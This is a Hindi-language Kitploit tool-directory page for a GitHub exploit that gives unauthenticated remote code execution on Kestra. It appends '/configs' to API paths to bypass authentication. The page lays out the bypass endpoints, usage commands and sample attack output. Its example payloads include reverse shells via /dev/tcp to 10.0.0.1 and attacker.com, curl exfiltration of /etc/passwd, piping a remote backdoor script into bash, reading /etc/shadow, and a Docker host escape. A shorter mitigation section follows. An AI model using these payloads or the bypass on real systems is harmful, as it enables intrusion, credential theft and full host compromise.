Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-53576 — Kestra Unauthenticated RCE Exploit (CVE-2026-53576) | Kitploit
उपकरण/GitHubGitHub/tamatahyt/cve-2026-53576
Authentication & AuthorizationPrivilege EscalationExploitationWeb Application ExploitationData ExfiltrationPost-ExploitationPenetration TestingRed TeamingPayload DevelopmentContainer Escape
GitHubtamatahyt/cve-2026-53576
19 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-53576

Kestra Unauthenticated RCE Exploit (CVE-2026-53576)

रिपॉजिटरी देखें

Kestra बिना प्रमाणीकरण वाला RCE एक्सप्लॉइट (CVE-2026-53576)

Python License Security Kestra

गंभीर प्रमाणीकरण बायपास जो बिना प्रमाणीकरण के रिमोट कोड निष्पादन की ओर ले जाता है

एक्सप्लॉइट • भेद्यता विवरण • प्रभाव • निवारण


⚠️ अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।

  • उपयोग न करें उन सिस्टम पर जिनके मालिक आप नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है।
  • उपयोग न करें अवैध गतिविधियों के लिए।
  • लेखक इस टूल के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।
  • अपने जोखिम पर उपयोग करें।

📋 विषय-सूची

  • अवलोकन
  • भेद्यता विवरण
  • एक्सप्लॉइट उपयोग
  • स्थापना
  • उदाहरण
  • प्रभाव
  • निवारण
  • समयरेखा
  • संदर्भ
  • लाइसेंस

🔍 अवलोकन

CVE-2026-53576, Kestra OSS के v1.3.20 तक के संस्करणों में एक गंभीर भेद्यता है, जो प्रमाणीकरण फ़िल्टर बायपास के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन की अनुमति देती है।

मुख्य विवरण


🚨 भेद्यता विवरण

मूल कारण

Kestra में प्रमाणीकरण फ़िल्टर में एक गंभीर तर्क दोष है:

root@kitploit:~
// Vulnerable code in AuthenticationFilter.java:53
boolean isConfigEndpoint = request.getPath().endsWith("/configs")

यह जाँचता है कि क्या कोई भी API अनुरोध /configs पर समाप्त होता है, बजाय सटीक रूट से मेल खाने के। यह हमलावरों को किसी भी एंडपॉइंट पर /configs जोड़कर प्रमाणीकरण बायपास करने की अनुमति देता है।

एक्सप्लॉइटेशन के चरण

  1. दुर्भावनापूर्ण फ्लो बनाएं → POST /api/v1/main/flows/configs (प्रमाणीकरण बायपास करता है)
  2. निष्पादन ट्रिगर करें → POST /api/v1/main/executions/configs/configs (प्रमाणीकरण बायपास करता है)
  3. कमांड रूट के रूप में चलते हैं → पूर्ण सिस्टम समझौता

भेद्य एंडपॉइंट

root@kitploit:~
# Any path ending in /configs bypasses authentication
/api/v1/main/flows/configs          # Create flows
/api/v1/main/executions/configs/configs  # Execute flows
/api/v1/{tenant}/flows/configs      # Any tenant
/api/v1/{tenant}/executions/configs/configs  # Any tenant

💻 एक्सप्लॉइट उपयोग

मूल उपयोग

root@kitploit:~
python3 kestra_exploit.py <target_ip>

उन्नत उपयोग

root@kitploit:~
# Custom port
python3 kestra_exploit.py 192.168.1.100 -p 8080

# HTTPS
python3 kestra_exploit.py 192.168.1.100 --https

# Custom command
python3 kestra_exploit.py 192.168.1.100 -c "whoami && hostname"

# Check Docker socket access
python3 kestra_exploit.py 192.168.1.100 --docker-check

# Clean up after exploitation
python3 kestra_exploit.py 192.168.1.100 --cleanup

# Full attack with all options
python3 kestra_exploit.py 192.168.1.100 -p 8080 --docker-check --cleanup -c "id > /tmp/proof.txt"

कमांड विकल्प


📦 स्थापना

आवश्यकताएँ

root@kitploit:~
pip install requests

रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-53576
cd CVE-2026-53576

स्थापना सत्यापित करें

root@kitploit:~
python3 kestra_exploit.py --help

🎯 उदाहरण

उदाहरण 1: मूल एक्सप्लॉइटेशन

root@kitploit:~
python3 kestra_exploit.py 192.168.1.100

आउटपुट:

root@kitploit:~
============================================================
Kestra Unauthenticated RCE Exploit
Security Research Tool - Authorized Use Only!
============================================================
[*] Target: 192.168.1.100:8080
[*] Protocol: http
============================================================

[Step 1] Creating malicious flow...
[*] Creating malicious flow at http://192.168.1.100:8080/api/v1/main/flows/configs
[*] Command: id > /tmp/proof.txt; cat /etc/shadow | head -1 >> /tmp/proof.txt
[+] Flow created successfully! (Status: 200)
[+] Flow revision: 26

[Step 2] Triggering execution...
[*] Triggering execution at http://192.168.1.100:8080/api/v1/main/executions/configs/configs
[+] Execution triggered successfully!
[+] Execution ID: 4nxNTHPk2WInfrnxQa6KF2
[+] Status: CREATED

[Step 3] Checking execution status...
[+] Execution status: SUCCESS
[*] Final status: SUCCESS

[+] Exploitation complete!
[*] To verify the attack succeeded, check the target system for:
    - /tmp/proof.txt containing command output
    - Kestra UI execution logs
    - Web UI: http://192.168.1.100:8080/ui/

उदाहरण 2: रिवर्स शेल

root@kitploit:~
python3 kestra_exploit.py 192.168.1.100 -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

उदाहरण 3: डेटा एक्सफ़िल्ट्रेशन

root@kitploit:~
python3 kestra_exploit.py 192.168.1.100 -c "curl -X POST http://attacker.com/exfil -d @/etc/passwd"

उदाहरण 4: Docker एस्केप जाँच

root@kitploit:~
python3 kestra_exploit.py 192.168.1.100 --docker-check --cleanup

💥 प्रभाव

प्रत्यक्ष प्रभाव

हमले की क्षमताएँ

एक बिना प्रमाणीकरण वाला हमलावर निम्न कार्य कर सकता है:

  1. रूट के रूप में मनमाने कमांड निष्पादित करें:

    root@kitploit:~
    # Read secrets
    cat /app/conf/application.yml
    
    # Reverse shell
    bash -i >& /dev/tcp/attacker.com/4444 0>&1
    
    # Install malware
    curl http://attacker.com/backdoor.sh | bash
    
  2. होस्ट सिस्टम में पिवट करें (यदि Docker सॉकेट माउंटेड है):

    root@kitploit:~
    docker run -v /:/host --privileged alpine chroot /host
    
  3. क्लाउड मेटाडेटा एक्सेस करें (यदि क्लाउड प्रदाता पर हैं):

    root@kitploit:~
    curl http://169.254.169.254/latest/meta-data/
    

🛡️ निवारण

तत्काल कार्रवाई

  1. भेद्य इंस्टेंस बंद करें:

    root@kitploit:~
    sudo systemctl stop kestra
    
  2. सार्वजनिक एक्सेस ब्लॉक करें:

    root@kitploit:~
    iptables -A INPUT -p tcp --dport 8080 -j DROP
    
  3. फ़ायरवॉल नियम लागू करें:

    • आंतरिक नेटवर्क तक सीमित करें
    • प्रशासनिक एक्सेस के लिए VPN का उपयोग करें

स्थायी समाधान

  1. Kestra को नवीनतम पैच किए गए संस्करण में अपडेट करें:

    • निगरानी करें: https://github.com/kestra-io/kestra
    • जाँच करें: https://github.com/kestra-io/kestra/security/advisories/GHSA-2q47-568g-9h4f
  2. उचित प्रमाणीकरण लागू करें:

    • Basic Auth के बजाय OAuth2/OIDC का उपयोग करें
    • बहु-कारक प्रमाणीकरण सक्षम करें
  3. कंटेनर हार्डनिंग:

    • गैर-root उपयोगकर्ता के रूप में चलाएं
    • /var/run/docker.sock माउंट न करें
    • रीड-ओनली रूट फाइलसिस्टम का उपयोग करें
  4. नेटवर्क हार्डनिंग:

    • उचित रूटिंग के साथ API गेटवे का उपयोग करें
    • WAF नियम लागू करें
    • अनुरोध सत्यापन सक्षम करें

📅 समयरेखा

तारीखघटना
2026-05-26भेद्यता खोजी गई
2026-06-03Kestra सुरक्षा सलाह प्रकाशित हुई
2026-06-10CVE-2026-53576 निर्धारित किया गया

📚 संदर्भ

  • Kestra सुरक्षा सलाह GHSA-2q47-568g-9h4f
  • Huawei PSIRT
  • CVE-2026-53576 विवरण
  • OWASP Top 10 - टूटा एक्सेस नियंत्रण

📄 लाइसेंस

root@kitploit:~
MIT License

Copyright (c) 2026 Security Researcher

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

⭐ समर्थन

यदि आपको यह टूल उपयोगी लगे:

  • ⭐ रिपॉजिटरी को स्टार करें
  • 🐛 समस्याएँ रिपोर्ट करें
  • 🔄 पुल रिक्वेस्ट सबमिट करें
  • 📢 जिम्मेदारी से साझा करें

🙏 आभार

  • Kestra टीम को उनकी सुरक्षा सलाह के लिए
  • इस भेद्यता का खुलासा करने वाले सुरक्षा शोधकर्ताओं को
  • ओपन-सोर्स सुरक्षा समुदाय को

⚠️ जिम्मेदारी से उपयोग करें ⚠️

भेद्यता रिपोर्ट करें • सुरक्षा नीति • संपर्क करें

टूल डाउनलोड करें
विशेषतामान
CVE IDCVE-2026-53576
गंभीरतागंभीर (9.8 CVSS)
भेद्यता प्रकारप्रमाणीकरण बायपास + RCE
प्रभावित उत्पादKestra OSS
प्रभावित संस्करण≤ v1.3.20
हमला वेक्टरनेटवर्क
प्रमाणीकरण आवश्यकनहीं
उपयोगकर्ता सहभागितानहीं
विकल्पविवरण
targetलक्ष्य IP पता या होस्टनाम (आवश्यक)
-p, --portपोर्ट (डिफ़ॉल्ट: 8080)
--httpsHTTP के बजाय HTTPS का उपयोग करें
-c, --commandनिष्पादित करने के लिए कस्टम कमांड
--docker-checkDocker सॉकेट एक्सेस की जाँच करें
--cleanupएक्सप्लॉइटेशन के बाद फ्लो को हटाएं
--delayअनुरोधों के बीच विलंब (डिफ़ॉल्ट: 2s)
श्रेणीगंभीरताविवरण
गोपनीयता⚠️ गंभीरकोई भी फ़ाइल पढ़ें (पासवर्ड, रहस्य, कॉन्फ़िगरेशन)
अखंडता⚠️ गंभीरफ्लो और डेटा बनाएं/संशोधित करें/हटाएं
उपलब्धता⚠️ उच्चसिस्टम बंद करें, संसाधनों की कमी
प्रमाणीकरण⚠️ गंभीरBasic-Auth का पूर्ण बायपास
विशेषाधिकार वृद्धि⚠️ गंभीरकमांड रूट के रूप में चलते हैं (uid=0)
कंटेनर एस्केप⚠️ गंभीरDocker सॉकेट के माध्यम से होस्ट से समझौता
2026-06-15सार्वजनिक खुलासा
2026-08-01PoC प्रकाशित हुआ